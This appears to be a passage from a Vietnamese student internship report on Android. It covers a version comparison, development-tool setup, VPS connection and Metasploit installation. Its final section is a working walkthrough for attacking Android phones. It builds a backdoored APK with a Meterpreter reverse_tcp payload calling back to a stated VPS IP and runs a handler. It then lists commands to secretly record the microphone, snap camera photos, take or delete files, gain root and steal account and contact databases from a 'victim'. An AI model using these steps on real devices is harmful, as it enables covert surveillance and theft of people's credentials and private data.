Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích. - Phá vỡ rào cản phát triển ứng dụng: Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS. - Xây dựng ứng dụng dễ dàng và nhanh chóng: Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết
  • 61. 61 được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng. 3. Tìm hiểu sự giống nhau và khác nhau của phiên bản Android 2.x và 4.x: Theo thống kê tình hình những phiên bản hệ điều hành Android công bố đầu tháng 9 này đã cho thấy có nhiều sự thay đổi lớn. Phiên bản Gingerbread (2.3.x) dù đã ra mắt rất lâu rồi nhưng vẫn về vị trí thứ 2 với 30,7% thị phần, đứng sau phiên bản Jelly Bean (4.1.x và 4.2.x) với 45,1% thị phần và về vị trí thứ 3 là phiên bản Ice Cream Sandwich (4.0.x) với 21,7% thị phần. Ta có thể tải các tài liêu về các phiên bản Android do Google công bố ở link sau để nghiên cứu và tìm hiểu: http://source.android.com/compatibility/downloads.html Ở đây ta sẽ thấy được 4 điểm khác nhau rõ nét nhất của 2 phiên bản này: - Giao diện (Graphical User Interface) - Tính năng (Functionality) - Giao thức mạng (Network Protocol) - Yêu cầu phần cứng (Hardware) 3.1 Giao diện người dùng: Android 2.3 Android 4.0 Giao diện đơn giản Giao diện trong suốt, tinh tế và phong cách hơn Không hỗ trợ phím ảo Hỗ trợ phím ảo Không có widgets menu Có widgets menu
  • 62. 62 3.2. Tính năng: Android 2.3 Android 4.0 Tối ưu hóa cho smart phone Tối ưu hóa cho cả tablets và smart phone Xóa tất cả thông báo Xóa được từng thông báo Chỉ có thể trả lời cuộc gọi khi màn hình bị khóa Có thể thực hiện nhiều tính năng khi màn hình bị khóa Không hỗ trợ nhận biết khuôn mặt Mở khóa bằng nhận biết khuôn mặt (face unclock) Không có quản lý mức độ sử dụng dữ liệu Có quản lý mức độ xử dụng dữ liệu Quay phim độ nét không quá 480p Quay phim độ nét lên tới 1080p 3.3. Giao thức mạng: Android 2.3 Android 4.0 Không hỗ trợ giao thức https Hỗ trợ giao thức https
  • 63. 63 3.4. Yêu cầu phần cứng: Android 2.3 Android 4.0 Cung cấp ít nhất 128MB cho kernel Cung cấp ít nhất 340MB cho kernel Dung lượng RAM ít nhất là 150MB Dung lượng RAM ít nhất là 350MB Thiết bị phải có khả năng tải về một file 55MB hoặc hớn hơn Thiết bị phải có khả năng tải về một file 100MB hoặc lớn hơn Độ phân giải màn hình ít nhất 100dpi Độ phân giải màn hình ít nhất 120dpi Yêu cầu phải có các phím vật lý Không yêu cầu phải có các phím vật lý Kiểm tra hiệu suất dựa trên thời gian mở ứng dụng: Trình duyệt: ít hơn 1300ms MMS/SMS: ít hơn 700ms Báo thức: ít hơn 650ms Kiểm ra hiệu suất dựa trên thời gian mở ứng dụng: Trình duyệt: ít hơn 1300ms MMS/SMS: ít hơn 700ms Cài đặt: ít hơn 700ms
  • 64. 64 V. Tạo máy ảo android trên Eclipse 1, Bộ Java SE Development Kit (JDK) JDK cung cấp một bộ công cụ cho cho người phát triển ứng dụng bằng ngôn ngữ lập trình Java. Phần mềm được dùng để viết Applet Java hay những ứng dụng Java khác, gồm có trình biên dịch, trình thông dịch, sửa lỗi, chạy applet và tài liệu nghiên cứu. JDK cho phép người sử dụng lưu, chỉnh sửa, in và biên dịch mã Java tạo ra. công cụ này có thể được sử dụng để chạy và gỡ lỗi Java applet mà không cần phải thông qua một trình duyệt web. Với tiện ích này, người dùng có thể tạo cơ sở dữ liệu cho việc lập trình bằng Java, phát hiện các xung đột file JAR. Người dùng cũng có thể biên dịch tập tin IDL sang Java. Để download bộ JDK các bạn truy cập link sau : http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html
  • 65. 65 Các bạn chọn Accept License Agreement sau đó chọn phiên bản phù hợp với hệ điều hành đang sử dụng và download về.
  • 66. 66 Sau khi download hoàn tất chúng ta tiến hành giải nén và cài đặt bộ java SDK này. Quá trình cài đặt khá đơn giản ta chỉ cần nhấn next cho đến khi hoàn tất cài đặt. Trong quá trình cài đặt ta có thể chọn vị trí lưu bằng cách chọn change và chọn nơi lưu. Sau khi cài đặt xong có thể kiểm tra lại bằng cách vào cửa sổ cmd nhập lệnh “Java”
  • 67. 67
  • 68. 68 2, Eclipse IDE và Android SDK - Eclipse là cơ sở cho việc xây dựng và chạy các công cụ phát triển phần mềm tích hợp, xuyên suốt từ đầu đến cuối. Nền tảng này bao gồm các thành phần phần mềm mã nguồn mở được các nhà cung cấp công cụ sử dụng để xây dựng các giải pháp cắm thêm vào Các bàn làm việc (Workbench) phần mềm tích hợp. Nền tảng Eclipse tích hợp công nghệ được biểu diễn thông qua một khung công tác được thiết kế và triển khai thực hiện rõ ràng. - Android SDK là một máy ảo của Android trên PC.SDK hỗ trợ bạn lập trình các ứng dụng của Android trên PC Để Eclipse và Android SDK nói trên các bạn truy cập link sau: http://developer.android.com/sdk/index.html Sau đó chọn Sau đó tích vào I have read and…. Sau đó chọn phiên bàn Win và tiến hành download
  • 69. 69 Sau khi tải về hoàn tất ta giải nén và tiến hành cài đặt eclipse và SDK
  • 70. 70 2.1, Cài đặt Eclipse Mở file setup Eclipse, chọn đường dẫn ( vị trí lưu ) sau đó chọn ok.
  • 71. 71 Giao diện của eclipse 2.2, Cài đặt Android SDK Chọn Run as administrator file SDK manager
  • 72. 72 Chọn như hình sau và tiến hành download
  • 73. 73
  • 74. 74 Sau khi quá trình download hoàn tất, ta chọn Accpect License và chọn Install. 3, Tích hợp Android SDK vào Eclipse: Sau khi đã hoàn tất cài đặt Eclipse và Android SDK ta tiến hành tích hợp Android SDK vào Eclipse. Bước 1: Mở Eclipse
  • 75. 75 Vào Help > Install new software… > Add
  • 76. 76 Đặt tên ở mục Name: Ở mục Location ta nhập một trong hai địa chỉ sau https://dl.google.com/android/eclipse hoặc https://dl-ssl.google.com/android/eclipse Sau đó chọn ok Bước 2: Ở cửa sổ Name > Tick vào Developer Tools
  • 77. 77 Bước 3: Chọn các Next > Next > Accept > Next > Finish – Run in Background Bước 4: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư mục Android SDK đã tải > Apply > OK Bước 5: Khởi đông lại Eclipse
  • 78. 78 VI. KẾT NỐI MÁY CHỦ ẢO VPS 1, Giới thiệu máy chủ ảo VPS: - Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. - Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. - Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. - VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,… 2, Đặc điểm của VPS: - Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. - Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. - Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… - Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. - Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
  • 79. 79 3, Giá trị khi sử dụng VPS: - Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. - Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. - Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. - Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. - Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. 4, Kết nối VPS: - Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta cần sử dụng ứng dụng Remote Desktop Connection. - Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs > Accessories > Remote Desktop Connection - Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta đăng ký tài khoản VPS. - Như vậy là ta đã có thể kết nối với máy chủ ảo VPS.
  • 80. 80 VII. CÀI ĐẶT METASPLOIT TRÊN VPS Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành tải và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại Android 1. Giới thiệu về phần mềm Metasploit: - Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. - Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, Assembler, và Python. - Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 2. Giới thiệu payload Meterpreter: - Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. - Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object( DLL) files. - Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus. - Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload Meterpreter này.
  • 81. 81 3. Cài đặt Metasploit: Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng bản Community. Bước 2: Tiến hành đăng ký để tải Metasploit Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để Active Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng ký.
  • 82. 82 Bước 3: Cài đặt phần mềm qua file đã tải về - Chọn thư mục cài đặt - Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790 - Chọn server và ngày hết hạn, để mặc định. - Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn - Nhấp Finish và truy cập đến giao diện web của chương trình Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link https://localhost:3790/ Tạo một tài khoản sử dụng: Nhập Key đã nhận từ email: Chọn ACTIVATE LICENSE
  • 83. 83 Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit > Metasploit Console
  • 84. 84 IIX. T N CÔNG Ấ MÁY ANDROID TỪ MÁY VPS 1. Tạo ứng dụng chứa mã độc trên Kali Linux: Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal. Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: “msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk 2. Tấn công điện thoại Android: Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút. Bước 2: Tiến hành thiết đặt payload bằng các lệnh  “ use exploit/multi/handler ”  “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162 ”  “ set lport 4444 ”  “ run ” Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên. Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau:
  • 85. 85 Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
  • 86. 86 3. Các phương thức tấn công được sử dụng: Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 3.1 Ghi âm lén: Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 3.2 Sử dụng camera: Xem danh sách webcam của thiết bị: “ webcam_list ” Chụp ảnh lén: “webcam_snap <mã camera>” 3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: Di chuyển vào thư mục bằng lệnh: cd Tải về bằng lệnh: download <tên file> Xóa tập tin bằng lệnh: rm <tên file>
  • 87. 87
  • 88. 88 3.4 Truy cập trực tiếp vào hệ thống: Truy cập vào hệ thống bằng lệnh: “shell” > “su” Kiểm tra máy đã root hay chưa bằng lệnh: “whoami” Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn công. 3.5 Truy cập và khai thác tài khoản người dùng: Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard” Trở về meterpreter và tải file accounts.db về:
  • 89. 89 Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db 3.6 Truy cập và đánh cắp danh bạ điện thoại: Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: “cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy
  • 90. 90 Xem nội dung của contacts2.db bằng SQLite Manager
  • 91. 91 3.7 Một số câu lệnh khác: - Để biết thêm về các lệnh có thể thực hiện ta dùng help - Để xem thông tin về máy, nhập lệnh sysinfo - Để xem các tác vụ đang chạy gõ ps - Xem ip của máy bị hack ta gõ ipconfig - Xem danh sách thư mục, file gõ ls - Để upload gõ lệnh upload - ls -l danh mục file và các quyền - Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách và down load các file hay thay đổi các file trong ROM Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại
  • 92. 92 PHỤ LỤC I : VIDEO QUÁ TRÌNH THỰC HIỆN · Giới thiệu bản thân https://www.youtube.com/watch?v=CxY2FVXRLR0 · Cài đặt Kali Lunix trên máy ảo VMware https://www.youtube.com/watch?v=UQxMjJsxMFY · Tạo Applications chứa mã độc https://www.youtube.com/watch?v=OQrSzidyMhs · Tạo link liên kết chứa mã độc bằng XSSF http://youtu.be/VNaJDwMrIYI · Cài đặt JDK – Java SE Development Kit http://youtu.be/GIzDLbKlJv0 · Tích hợp JDK và Eclipse, Tạo máy ảo Android trên Eclipse http://youtu.be/bqCpa9NTbd4 · Tấn công Android từ môi trường VPS http://youtu.be/FccqtFVeLz4 · Tổng kết thuận lợi, khó khan trong quá trình thực tập https://www.youtube.com/watch?v=bqi3-sfqBBg
  • 93. 93 PHỤ LỤC II : TÀI LIỆU THAM KHẢO · http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82- may-android-110510 · http://sinhvienit.net/forum · http://forum.bkav.com.vn · http://developer.android.com/sdk/index.html#download · http://www.oracle.com/technetwork/java/javase/downloads · http://choimobile.vn/forums/#thao-luan-hdh-android.62 · http://www.oracle.com/technetwork/server- storage/ virtualbox/downloads/index.html · http://www.genymotion.com/ · http://www.whitehat.vn/threads/ · https://code.google.com/p/dex2jar/ · https://code.google.com/p/innlab/downloads/detail?name=jd-gui- 0.3.3.windows.zip& · http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-giao- dien-cuc-manh.12/ · Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – www.Athena.Edu.Vn